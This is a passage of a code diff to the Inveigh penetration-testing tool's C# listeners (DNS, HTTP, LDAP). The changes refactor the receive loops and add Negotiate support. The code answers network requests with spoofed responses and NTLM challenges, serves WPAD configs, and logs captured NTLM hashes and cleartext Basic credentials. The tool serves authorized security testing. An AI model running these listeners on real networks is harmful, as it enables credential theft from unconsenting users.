(!udpAsync.IsCompleted); + + if (isRunning) + { + byte[] receiveBuffer = listener.EndReceive(udpAsync, ref ipEndPoint); + ProcessRequest(receiveBuffer, listener, ipEndPoint, mac, dnsIPv6); + } } catch (Exception ex) { diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DNSListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DNSListener.cs index 5d0ffe1..b2542f4 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DNSListener.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/DNSListener.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -34,6 +34,7 @@ using System; using System.IO; using System.Net; using System.Net.Sockets; +using System.Threading; namespace Quiddity { @@ -45,6 +46,8 @@ namespace Quiddity public ushort Priority { get; set; } public ushort Weight { get; set; } + public static bool isRunning = false; + public DNSListener() { this.TTL = 30; @@ -67,6 +70,8 @@ namespace Quiddity { UDPListener listener = new UDPListener(AddressFamily.InterNetwork); IPEndPoint ipEndPoint = new IPEndPoint(ipAddress, 53); + isRunning = true; + IAsyncResult udpAsync; if (String.Equals(ipAddress.AddressFamily.ToString(), "InterNetworkV6")) { @@ -75,13 +80,31 @@ namespace Quiddity listener.Client.Bind(ipEndPoint); - while (true) + while (isRunning) { try { - byte[] receiveBuffer = listener.Receive(ref ipEndPoint); - ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP, replyIPv6); + udpAsync = listener.BeginReceive(null, null); + + do + { + Thread.Sleep(10); + + if (!isRunning) + { + break; + } + + } + while (!udpAsync.IsCompleted); + + if (isRunning) + { + byte[] receiveBuffer = listener.EndReceive(udpAsync, ref ipEndPoint); + ProcessRequest(receiveBuffer, listener, ipEndPoint, replyIP, replyIPv6); + } + } catch (Exception ex) { diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/HTTPListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/HTTPListener.cs index 6ff3f8b..7a17131 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/HTTPListener.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/HTTPListener.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -115,9 +115,13 @@ namespace Quiddity } while (!tcpAsync.IsCompleted); - TcpClient tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync); - object[] parameters = { tcpClient, type }; - ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters); + if (isRunning) + { + TcpClient tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync); + object[] parameters = { tcpClient, type, port }; + ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters); + } + } catch (Exception ex) { @@ -141,342 +145,357 @@ namespace Quiddity object[] parameterArray = parameters as object[]; TcpClient tcpClient = (TcpClient)parameterArray[0]; string type = (string)parameterArray[1]; - string[] supportedMethods = { "GET", "HEAD", "OPTIONS", "CONNECT", "POST", "PROPFIND" }; - string sourceIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString(); - string sourcePort = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Port.ToString(); - string listenerPort = ((IPEndPoint)(tcpClient.Client.LocalEndPoint)).Port.ToString(); - string session = sourceIP + ":" + sourcePort; - string ntlmChallenge = ""; - int ntlmStage = 0; - bool proxyIgnoreMatch = false; - bool wpadAuthIgnoreMatch = false; - NetworkStream tcpStream = null; - NetworkStream httpStream = null; - SslStream httpsStream = null; - X509Certificate2 certificate = null; - bool isClientClose = false; - - if (type.Equals("HTTPS")) - { - byte[] certificateData = Convert.FromBase64String(Cert); - certificate = new X509Certificate2(certificateData, CertPassword, X509KeyStorageFlags.MachineKeySet); - tcpStream = tcpClient.GetStream(); - httpsStream = new SslStream(tcpStream, false); - } - else - { - httpStream = tcpClient.GetStream(); - } + int port = (int)parameterArray[2]; - while (tcpClient.Connected && isRunning) + try { - byte[] requestData = new byte[4096]; + string[] supportedMethods = { "GET", "HEAD", "OPTIONS", "CONNECT", "POST", "PROPFIND" }; + string sourceIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString(); + string sourcePort = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Port.ToString(); + string listenerPort = ((IPEndPoint)(tcpClient.Client.LocalEndPoint)).Port.ToString(); + string session = sourceIP + ":" + sourcePort; + string ntlmChallenge = ""; + int ntlmStage = 0; + bool proxyIgnoreMatch = false; + bool wpadAuthIgnoreMatch = false; + NetworkStream tcpStream = null; + NetworkStream httpStream = null; + SslStream httpsStream = null; + X509Certificate2 certificate = null; + bool isClientClose = false; if (type.Equals("HTTPS")) { - - do - { - Thread.Sleep(100); - } - while (!tcpStream.DataAvailable && tcpClient.Connected); - + byte[] certificateData = Convert.FromBase64String(Cert); + certificate = new X509Certificate2(certificateData, CertPassword, X509KeyStorageFlags.MachineKeySet); + tcpStream = tcpClient.GetStream(); + httpsStream = new SslStream(tcpStream, false); } else { - - do - { - Thread.Sleep(100); // todo check - } - while (!httpStream.DataAvailable && tcpClient.Connected); - + httpStream = tcpClient.GetStream(); } - if (String.Equals(type, "HTTPS")) + while (tcpClient.Connected && isRunning) { + byte[] requestData = new byte[16384]; - try + if (type.Equals("HTTPS")) { - if (!httpsStream.IsAuthenticated) - { - httpsStream.AuthenticateAsServer(certificate, false, tls12, false); - } - - while (tcpStream.DataAvailable) + do { - httpsStream.Read(requestData, 0, requestData.Length); + Thread.Sleep(100); } + while (!tcpStream.DataAvailable && tcpClient.Connected); } - catch (Exception ex) + else { - if (!ex.Message.Contains("A call to SSPI failed, see inner exception.")) // todo check + do { - Console.WriteLine(ex.Message); + Thread.Sleep(100); // todo check } + while (!httpStream.DataAvailable && tcpClient.Connected); } - } - else - { - - while (httpStream.DataAvailable) + if (String.Equals(type, "HTTPS")) { - httpStream.Read(requestData, 0, requestData.Length); - } - - } - - HTTPRequest request = new HTTPRequest(); - - if (!Utilities.ArrayIsNullOrEmpty(requestData)) - { - request.ReadBytes(requestData, 0); - } - - if (!string.IsNullOrEmpty(request.Method)) - { - OutputRequestMethod(type, listenerPort, sourceIP, sourcePort, request.URI, request.Method); - } - if (!string.IsNullOrEmpty(request.URI)) - { - OutputHostHeader(type, listenerPort, sourceIP, sourcePort, request.Host); - } - - if (!string.IsNullOrEmpty(request.UserAgent)) - { - OutputUserAgent(type, listenerPort, sourceIP, sourcePort, request.UserAgent); - } + try + { - if (!string.IsNullOrEmpty(request.Method) && Array.Exists(supportedMethods, element => element == request.Method)) - { + if (!httpsStream.IsAuthenticated) + { + httpsStream.AuthenticateAsServer(certificate, false, tls12, false); + } - HTTPResponse response = new HTTPResponse - { - Version = "HTTP/1.1", - StatusCode = "401", - ReasonPhrase = "Unauthorized", - Connection = "close", - Server = "Microsoft-HTTPAPI/2.0", - Date = DateTime.Now.ToString("R"), - ContentType = "text/html", - ContentLength = "0" - }; - - if (!Utilities.ArrayIsNullOrEmpty(IgnoreAgents) && WPADAuth.Equals("NTLM")) - { + while (tcpStream.DataAvailable) + { + httpsStream.Read(requestData, 0, requestData.Length); + } - foreach (string agent in IgnoreAgents) + } + catch (Exception ex) { - if (request.UserAgent.ToUpper().Contains(agent.ToUpper())) + if (!ex.Message.Contains("A call to SSPI failed, see inner exception.")) // todo check { - wpadAuthIgnoreMatch = true; + Console.WriteLine(ex.Message); } } - if (wpadAuthIgnoreMatch) + } + else + { + + while (httpStream.DataAvailable) { - OutputIgnore(type, listenerPort, sourceIP, sourcePort, "switching wpad.dat auth to anonymous due to user agent match"); // todo make better + httpStream.Read(requestData, 0, requestData.Length); } } + + HTTPRequest request = new HTTPRequest(); - if (type.Equals("Proxy")) - { - response.StatusCode = "407"; - response.ProxyAuthenticate = "NTLM"; - response.WWWAuthenticate = ""; - response.Connection = "close"; - } - else if (EnabledWebDAV && request.Method.Equals("PROPFIND") && WebDAVAuth.StartsWith("NTLM")) - { - response.WWWAuthenticate = "NTLM"; - } - else if (EnabledWebDAV && request.Method.Equals("PROPFIND") && WebDAVAuth.Equals("BASIC")) + if (!Utilities.ArrayIsNullOrEmpty(requestData)) { - response.WWWAuthenticate = string.Concat("Basic realm=", HTTPRealm); + request.ReadBytes(requestData, 0); } - else if (!string.Equals(request.URI, "/wpad.dat") && string.Equals(HTTPAuth, "ANONYMOUS") || string.Equals(request.URI, "/wpad.dat") && string.Equals(WPADAuth, "ANONYMOUS") || wpadAuthIgnoreMatch || - (EnabledWebDAV && request.Method.Equals("OPTIONS"))) + + if (!string.IsNullOrEmpty(request.Method)) { - response.StatusCode = "200"; - response.ReasonPhrase = "OK"; + OutputRequestMethod(type, listenerPort, sourceIP, sourcePort, request.URI, request.Method); } - else if ((HTTPAuth.StartsWith("NTLM") && !string.Equals(request.URI, "/wpad.dat")) || (WPADAuth.StartsWith("NTLM") && string.Equals(request.URI, "/wpad.dat"))) + + if (!string.IsNullOrEmpty(request.URI)) { - response.WWWAuthenticate = "NTLM"; + OutputHostHeader(type, listenerPort, sourceIP, sourcePort, request.Host); } - else if ((string.Equals(HTTPAuth, "BASIC") && !string.Equals(request.URI, "/wpad.dat")) || (string.Equals(WPADAuth, "BASIC") && string.Equals(request.URI, "/wpad.dat"))) + + if (!string.IsNullOrEmpty(request.UserAgent)) { - response.WWWAuthenticate = string.Concat("Basic realm=", HTTPRealm); + OutputUserAgent(type, listenerPort, sourceIP, sourcePort, request.UserAgent); } - if ((!string.IsNullOrEmpty(request.Authorization) && request.Authorization.ToUpper().StartsWith("NTLM ")) || (!string.IsNullOrEmpty(request.ProxyAuthorization)) && request.ProxyAuthorization.ToUpper().StartsWith("NTLM ")) + if (!string.IsNullOrEmpty(request.Method) && Array.Exists(supportedMethods, element => element == request.Method)) { - string authorization = request.Authorization; - if (!string.IsNullOrEmpty(request.ProxyAuthorization)) + HTTPResponse response = new HTTPResponse { - authorization = request.ProxyAuthorization; - } - - NTLMNegotiate ntlm = new NTLMNegotiate(); - ntlm.ReadBytes(Convert.FromBase64String(authorization.Substring(5, authorization.Length - 5)), 0); - - if (ntlm.MessageType == 1) + Version = "HTTP/1.1", + StatusCode = "401", + ReasonPhrase = "Unauthorized", + Connection = "close", + Server = "Microsoft-HTTPAPI/2.0", + Date = DateTime.Now.ToString("R"), + ContentType = "text/html", + ContentLength = "0" + }; + + if (!Utilities.ArrayIsNullOrEmpty(IgnoreAgents) && WPADAuth.Equals("NTLM")) { - byte[] timestamp = BitConverter.GetBytes(DateTime.Now.ToFileTime()); - NTLMChallenge challenge = new NTLMChallenge(Challenge, NetbiosDomain, ComputerName, DNSDomain, ComputerName, DNSDomain); - byte[] challengeData = challenge.GetBytes(ComputerName); - ntlmChallenge = BitConverter.ToString(challenge.ServerChallenge).Replace("-", ""); - string sessionTimestamp = BitConverter.ToString(timestamp).Replace("-", ""); - httpSessionTable[sessionTimestamp] = ntlmChallenge; - OutputChallenge(type, listenerPort, sourceIP, sourcePort, ntlmChallenge); - - if (String.Equals(type, "Proxy")) + + foreach (string agent in IgnoreAgents) { - response.StatusCode = "407"; - response.ProxyAuthenticate = "NTLM " + Convert.ToBase64String(challengeData); + + if (request.UserAgent.ToUpper().Contains(agent.ToUpper())) + { + wpadAuthIgnoreMatch = true; + } + } - else + + if (wpadAuthIgnoreMatch) { - response.WWWAuthenticate = "NTLM " + Convert.ToBase64String(challengeData); + OutputIgnore(type, listenerPort, sourceIP, sourcePort, "switching wpad.dat auth to anonymous due to user agent match"); // todo make better } - response.Connection = ""; } - else if (ntlm.MessageType == 3) + + if (type.Equals("Proxy")) + { + response.StatusCode = "407"; + response.ProxyAuthenticate = "NTLM"; + response.WWWAuthenticate = ""; + response.Connection = "close"; + } + else if (EnabledWebDAV && request.Method.Equals("PROPFIND") && WebDAVAuth.StartsWith("NTLM")) + { + response.WWWAuthenticate = "NTLM"; + } + else if (EnabledWebDAV && request.Method.Equals("PROPFIND") && WebDAVAuth.Equals("BASIC")) + { + response.WWWAuthenticate = string.Concat("Basic realm=", HTTPRealm); + } + else if (!string.Equals(request.URI, "/wpad.dat") && string.Equals(HTTPAuth, "ANONYMOUS") || string.Equals(request.URI, "/wpad.dat") && string.Equals(WPADAuth, "ANONYMOUS") || wpadAuthIgnoreMatch || + (EnabledWebDAV && request.Method.Equals("OPTIONS"))) { response.StatusCode = "200"; response.ReasonPhrase = "OK"; - ntlmStage = 3; - isClientClose = true; - NTLMResponse ntlmResponse = new NTLMResponse(Convert.FromBase64String(authorization.Substring(5, authorization.Length - 5)), false); - string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); - string user = Encoding.Unicode.GetString(ntlmResponse.UserName); - string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); - string ntlmResponseHash = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); - string lmResponseHash = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); - - if (string.IsNullOrEmpty(ntlmChallenge)) // NTLMv2 workaround to track sessions over different ports without a cookie + } + else if ((HTTPAuth.StartsWith("NTLM") && !string.Equals(request.URI, "/wpad.dat")) || (WPADAuth.StartsWith("NTLM") && string.Equals(request.URI, "/wpad.dat"))) + { + response.WWWAuthenticate = "NTLM"; + } + else if ((string.Equals(HTTPAuth, "BASIC") && !string.Equals(request.URI, "/wpad.dat")) || (string.Equals(WPADAuth, "BASIC") && string.Equals(request.URI, "/wpad.dat"))) + { + response.WWWAuthenticate = string.Concat("Basic realm=", HTTPRealm); + } + + if (!string.IsNullOrEmpty(request.Authorization) && (request.Authorization.ToUpper().StartsWith("NTLM ") || request.Authorization.ToUpper().StartsWith("NEGOTIATE ")) || (!string.IsNullOrEmpty(request.ProxyAuthorization) && request.ProxyAuthorization.ToUpper().StartsWith("NTLM "))) + { + string authorization = request.Authorization; + + if (!string.IsNullOrEmpty(request.ProxyAuthorization)) { + authorization = request.ProxyAuthorization; + } + + NTLMNegotiate ntlm = new NTLMNegotiate(); + ntlm.ReadBytes(Convert.FromBase64String(authorization.Split(' ')[1]), 0); - try + if (ntlm.MessageType == 1) + { + byte[] timestamp = BitConverter.GetBytes(DateTime.Now.ToFileTime()); + NTLMChallenge challenge = new NTLMChallenge(Challenge, NetbiosDomain, ComputerName, DNSDomain, ComputerName, DNSDomain, timestamp); + byte[] challengeData = challenge.GetBytes(ComputerName); + ntlmChallenge = BitConverter.ToString(challenge.ServerChallenge).Replace("-", ""); + string sessionTimestamp = BitConverter.ToString(timestamp).Replace("-", ""); + httpSessionTable[sessionTimestamp] = ntlmChallenge; + OutputChallenge(type, listenerPort, sourceIP, sourcePort, ntlmChallenge); + + if (String.Equals(type, "Proxy")) { - byte[] timestamp = new byte[8]; - Buffer.BlockCopy(ntlmResponse.NtChallengeResponse, 24, timestamp, 0, 8); - string sessionTimestamp = BitConverter.ToString(timestamp).Replace("-", ""); - ntlmChallenge = httpSessionTable[sessionTimestamp].ToString(); + response.StatusCode = "407"; + response.ProxyAuthenticate = "NTLM " + Convert.ToBase64String(challengeData); } - catch + else { - ntlmChallenge = ""; - } - } + if (request.Authorization.ToUpper().StartsWith("NEGOTIATE ")) + { + response.WWWAuthenticate = "Negotiate " + Convert.ToBase64String(challengeData); + } + else + { + response.WWWAuthenticate = "NTLM " + Convert.ToBase64String(challengeData); + } - OutputNTLM(type, listenerPort, sourceIP, sourcePort, user, domain, host, ntlmChallenge, ntlmResponseHash, lmResponseHash); + } - if (type.Equals("Proxy")) + response.Connection = ""; + } + else if (ntlm.MessageType == 3) { - - if (!string.IsNullOrEmpty(HTTPResponse)) + response.StatusCode = "200"; + response.ReasonPhrase = "OK"; + ntlmStage = 3; + isClientClose = true; + NTLMResponse ntlmResponse = new NTLMResponse(Convert.FromBase64String(authorization.Split(' ')[1]), false); + string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); + string user = Encoding.Unicode.GetString(ntlmResponse.UserName); + string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); + string ntlmResponseHash = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); + string lmResponseHash = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); + + if (string.IsNullOrEmpty(ntlmChallenge)) // NTLMv2 workaround to track sessions over different ports without a cookie { - response.CacheControl = "no-cache, no-store"; + + try + { + byte[] timestamp = new byte[8]; + Buffer.BlockCopy(ntlmResponse.NtChallengeResponse, 24, timestamp, 0, 8); + string sessionTimestamp = BitConverter.ToString(timestamp).Replace("-", ""); + ntlmChallenge = httpSessionTable[sessionTimestamp].ToString(); + } + catch + { + ntlmChallenge = ""; + } + } - } + OutputNTLM(type, listenerPort, sourceIP, sourcePort, user, domain, host, ntlmChallenge, ntlmResponseHash, lmResponseHash); - } + if (type.Equals("Proxy")) + { - } - else if (!string.IsNullOrEmpty(request.Authorization) && request.Authorization.ToUpper().StartsWith("BASIC ")) - { - response.StatusCode = "200"; - response.ReasonPhrase = "OK"; - string httpHeaderAuthorizationBase64 = request.Authorization.Substring(6, request.Authorization.Length - 6); - string cleartextCredentials = Encoding.UTF8.GetString(Convert.FromBase64String(httpHeaderAuthorizationBase64)); - OutputCleartext(type, listenerPort, sourceIP, sourcePort, cleartextCredentials); - } + if (!string.IsNullOrEmpty(HTTPResponse)) + { + response.CacheControl = "no-cache, no-store"; + } - if (!string.IsNullOrEmpty(WPADResponse) && !proxyIgnoreMatch && string.Equals(request.URI, "/wpad.dat")) - { - response.ContentType = "application/x-ns-proxy-autoconfig"; - response.Message = Encoding.UTF8.GetBytes(WPADResponse); - } - else if (!string.IsNullOrEmpty(HTTPResponse)) - { - response.Message = Encoding.UTF8.GetBytes(HTTPResponse); - } + } - if (EnabledWebDAV) - { + } - if (request.Method.Equals("OPTIONS")) + } + else if (!string.IsNullOrEmpty(request.Authorization) && request.Authorization.ToUpper().StartsWith("BASIC ")) { response.StatusCode = "200"; response.ReasonPhrase = "OK"; - response.Allow = "OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK"; - response.Public = "OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK"; - response.DAV = "1,2,3"; - response.Author = "DAV"; + string httpHeaderAuthorizationBase64 = request.Authorization.Substring(6, request.Authorization.Length - 6); + string cleartextCredentials = Encoding.UTF8.GetString(Convert.FromBase64String(httpHeaderAuthorizationBase64)); + OutputCleartext(type, listenerPort, sourceIP, sourcePort, cleartextCredentials); } - else if (request.Method.Equals("PROPFIND")) + + if (!string.IsNullOrEmpty(WPADResponse) && !proxyIgnoreMatch && string.Equals(request.URI, "/wpad.dat")) + { + response.ContentType = "application/x-ns-proxy-autoconfig"; + response.Message = Encoding.UTF8.GetBytes(WPADResponse); + } + else if (!string.IsNullOrEmpty(HTTPResponse)) + { + response.Message = Encoding.UTF8.GetBytes(HTTPResponse); + } + + if (EnabledWebDAV) { - DateTime currentTime = DateTime.Now; - response.Message = Encoding.UTF8.GetBytes("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\">\r\n<HTML><HEAD><TITLE>Not Authorized</TITLE>\r\n<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD>\r\n<BODY><h2>Not Authorized</h2>\r\n<hr><p>HTTP Error 401. The requested resource requires user authentication.</p>\r\n</BODY></HTML>\r\n"); - response.Connection = ""; - if (ntlmStage == 3 || (!string.IsNullOrEmpty(request.Authorization) && request.Authorization.ToUpper().StartsWith("BASIC ")) || HTTPAuth.Equals("ANONYMOUS")) + if (request.Method.Equals("OPTIONS")) { - response.Connection = "close"; + response.StatusCode = "200"; + response.ReasonPhrase = "OK"; + response.Allow = "OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK"; + response.Public = "OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK"; + response.DAV = "1,2,3"; + response.Author = "DAV"; + } + else if (request.Method.Equals("PROPFIND")) + { + DateTime currentTime = DateTime.Now; + response.Message = Encoding.UTF8.GetBytes("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\">\r\n<HTML><HEAD><TITLE>Not Authorized</TITLE>\r\n<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD>\r\n<BODY><h2>Not Authorized</h2>\r\n<hr><p>HTTP Error 401. The requested resource requires user authentication.</p>\r\n</BODY></HTML>\r\n"); + response.Connection = ""; - if (!request.URI.Contains(".")) - { - response.ContentType = "text/xml"; - response.Message = Encoding.UTF8.GetBytes("<?xml version=\"1.0\" encoding=\"utf-8\"?><D:multistatus xmlns:D=\"DAV:\"><D:response><D:href>http://" + sourceIP + request.URI + "</D:href><D:propstat><D:status>HTTP/1.1 200 OK</D:status><D:prop><D:getcontenttype/><D:getlastmodified>" + currentTime.ToString("R") + "</D:getlastmodified><D:lockdiscovery/><D:ishidden>0</D:ishidden><D:supportedlock><D:lockentry><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry><D:lockentry><D:lockscope><D:shared/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:getetag/><D:displayname>webdav</D:displayname><D:getcontentlanguage/><D:getcontentlength>0</D:getcontentlength><D:iscollection>1</D:iscollection><D:creationdate>" + currentTime.ToString("yyyy-MM-ddThh:mm:ss.fffZ") + "</D:creationdate><D:resourcetype><D:collection/></D:resourcetype></D:prop></D:propstat></D:response></D:multistatus>"); - } - else + if (ntlmStage == 3 || (!string.IsNullOrEmpty(request.Authorization) && request.Authorization.ToUpper().StartsWith("BASIC ")) || HTTPAuth.Equals("ANONYMOUS")) { - response.ContentType = "text/plain"; + response.Connection = "close"; + + if (!request.URI.Contains(".")) + { + response.ContentType = "text/xml"; + response.Message = Encoding.UTF8.GetBytes("<?xml version=\"1.0\" encoding=\"utf-8\"?><D:multistatus xmlns:D=\"DAV:\"><D:response><D:href>http://" + sourceIP + request.URI + "</D:href><D:propstat><D:status>HTTP/1.1 200 OK</D:status><D:prop><D:getcontenttype/><D:getlastmodified>" + currentTime.ToString("R") + "</D:getlastmodified><D:lockdiscovery/><D:ishidden>0</D:ishidden><D:supportedlock><D:lockentry><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry><D:lockentry><D:lockscope><D:shared/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock><D:getetag/><D:displayname>webdav</D:displayname><D:getcontentlanguage/><D:getcontentlength>0</D:getcontentlength><D:iscollection>1</D:iscollection><D:creationdate>" + currentTime.ToString("yyyy-MM-ddThh:mm:ss.fffZ") + "</D:creationdate><D:resourcetype><D:collection/></D:resourcetype></D:prop></D:propstat></D:response></D:multistatus>"); + } + else + { + response.ContentType = "text/plain"; + } + } } } - } - - byte[] buffer = response.GetBytes(); - - if (type.Equals("HTTPS") && httpsStream.CanRead) - { - httpsStream.Write(buffer, 0, buffer.Length); - httpsStream.Flush(); - } - else if (httpStream.CanRead) - { - httpStream.Write(buffer, 0, buffer.Length); - httpStream.Flush(); - } - - if (isClientClose) - { + byte[] buffer = response.GetBytes(); - if (type.Equals("Proxy")) + if (type.Equals("HTTPS") && httpsStream.CanRead) { - tcpClient.Client.Close(); + httpsStream.Write(buffer, 0, buffer.Length); + httpsStream.Flush(); } - else + else if (httpStream.CanRead) { - tcpClient.Close(); + httpStream.Write(buffer, 0, buffer.Length); + httpStream.Flush(); + } + + if (isClientClose) + { + + if (type.Equals("Proxy")) + { + tcpClient.Client.Close(); + } + else + { + tcpClient.Close(); + } + } } @@ -484,6 +503,10 @@ namespace Quiddity } } + catch (Exception ex) + { + OutputError(ex, type, port); + } } diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LDAPListener.cs b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LDAPListener.cs index b3ea8f6..92ce66a 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LDAPListener.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Listeners/LDAPListener.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -82,9 +82,13 @@ namespace Quiddity } while (!tcpAsync.IsCompleted); - TcpClient tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync); - object[] parameters = { tcpClient }; - ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters); + if (isRunning) + { + TcpClient tcpClient = tcpListener.EndAcceptTcpClient(tcpAsync); + object[] parameters = { tcpClient, port }; + ThreadPool.QueueUserWorkItem(new WaitCallback(ReceiveClient), parameters); + } + } catch (Exception ex) { @@ -107,104 +111,114 @@ namespace Quiddity { object[] parameterArray = parameters as object[]; TcpClient tcpClient = (TcpClient)parameterArray[0]; + int port = (int)parameterArray[1]; NetworkStream tcpStream = tcpClient.GetStream(); string ntlmChallenge = ""; string clientIP = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Address.ToString(); string clientPort = ((IPEndPoint)(tcpClient.Client.RemoteEndPoint)).Port.ToString(); string listenerPort = ((IPEndPoint)(tcpClient.Client.LocalEndPoint)).Port.ToString(); - while (tcpClient.Connected && isRunning) + try { - byte[] requestData = new byte[4096]; - do + while (tcpClient.Connected && isRunning) { - Thread.Sleep(100); - } - while (!tcpStream.DataAvailable && tcpClient.Connected); - - while (tcpStream.DataAvailable) - { - tcpStream.Read(requestData, 0, requestData.Length); - } - - LDAPMessage message = new LDAPMessage(); - message.Decode(requestData); - LDAPMessage message2 = new LDAPMessage(); - message2.MessageID = message.MessageID; - byte[] buffer = new byte[0]; - OutputConnection(listenerPort, clientIP, clientPort, message.Tag); + byte[] requestData = new byte[4096]; - if (message.Tag == 3) - { - LDAPMessage message3 = new LDAPMessage(); - message3.MessageID = message.MessageID; - LDAPSearchRequest searchRequest = new LDAPSearchRequest(); - searchRequest.ReadBytes((byte[][])message.ProtocolOp); - - LDAPSearchResDone resdone = new LDAPSearchResDone(); - resdone.ResultCode = 0; - LDAPSearchResEntry search = new LDAPSearchResEntry(); - - if (String.Equals(searchRequest.Attributes[0], "supportedCapabilities")) + do { - LDAPSupportedCapabilities cap = new LDAPSupportedCapabilities(); - search.Attributes = cap.Encode(); + Thread.Sleep(100); } - else if (String.Equals(searchRequest.Attributes[0], "supportedSASLMechanisms")) + while (!tcpStream.DataAvailable && tcpClient.Connected); + + while (tcpStream.DataAvailable) { - LDAPSupportedSASLMechanisms mech = new LDAPSupportedSASLMechanisms(); - search.Attributes = mech.Encode(); + tcpStream.Read(requestData, 0, requestData.Length); } - message2.ProtocolOp = search; - message3.ProtocolOp = resdone; - buffer = Utilities.BlockCopy(message2.Encode(4), message3.Encode(5)); - } - else if (message.Tag == 0) - { - LDAPBindRequest bind = new LDAPBindRequest(); - bind.ReadBytes((byte[][])message.ProtocolOp); - LDAPSaslCredentials sasl = new LDAPSaslCredentials(); - sasl.ReadBytes(bind.Authentication); - NTLMNegotiate ntlm = new NTLMNegotiate(); - ntlm.ReadBytes(sasl.Credentials, 0); - - if (ntlm.MessageType == 1) + LDAPMessage message = new LDAPMessage(); + message.Decode(requestData); + LDAPMessage message2 = new LDAPMessage(); + message2.MessageID = message.MessageID; + byte[] buffer = new byte[0]; + OutputConnection(listenerPort, clientIP, clientPort, message.Tag); + + if (message.Tag == 3) { - NTLMChallenge challenge = new NTLMChallenge(Challenge, NetbiosDomain, ComputerName, DNSDomain, ComputerName, DNSDomain); - byte[] challengeData = challenge.GetBytes(ComputerName); - ntlmChallenge = BitConverter.ToString(challenge.ServerChallenge).Replace("-", ""); + LDAPMessage message3 = new LDAPMessage(); + message3.MessageID = message.MessageID; + LDAPSearchRequest searchRequest = new LDAPSearchRequest(); + searchRequest.ReadBytes((byte[][])message.ProtocolOp); - LDAPBindResponse bindResponse = new LDAPBindResponse - { - ServerSaslCreds = challengeData - }; + LDAPSearchResDone resdone = new LDAPSearchResDone(); + resdone.ResultCode = 0; + LDAPSearchResEntry search = new LDAPSearchResEntry(); - LDAPMessage bindMessage = new LDAPMessage + if (String.Equals(searchRequest.Attributes[0], "supportedCapabilities")) { - MessageID = message.MessageID, - ProtocolOp = bindResponse - }; + LDAPSupportedCapabilities cap = new LDAPSupportedCapabilities(); + search.Attributes = cap.Encode(); + } + else if (String.Equals(searchRequest.Attributes[0], "supportedSASLMechanisms")) + { + LDAPSupportedSASLMechanisms mech = new LDAPSupportedSASLMechanisms(); + search.Attributes = mech.Encode(); + } - buffer = bindMessage.Encode(3); - OutputChallenge(listenerPort, clientIP, clientPort, ntlmChallenge); + message2.ProtocolOp = search; + message3.ProtocolOp = resdone; + buffer = Utilities.BlockCopy(message2.Encode(4), message3.Encode(5)); } - else if (ntlm.MessageType == 3) + else if (message.Tag == 0) { - NTLMResponse ntlmResponse = new NTLMResponse(sasl.Credentials, false); - string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); - string user = Encoding.Unicode.GetString(ntlmResponse.UserName); - string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); - string response2 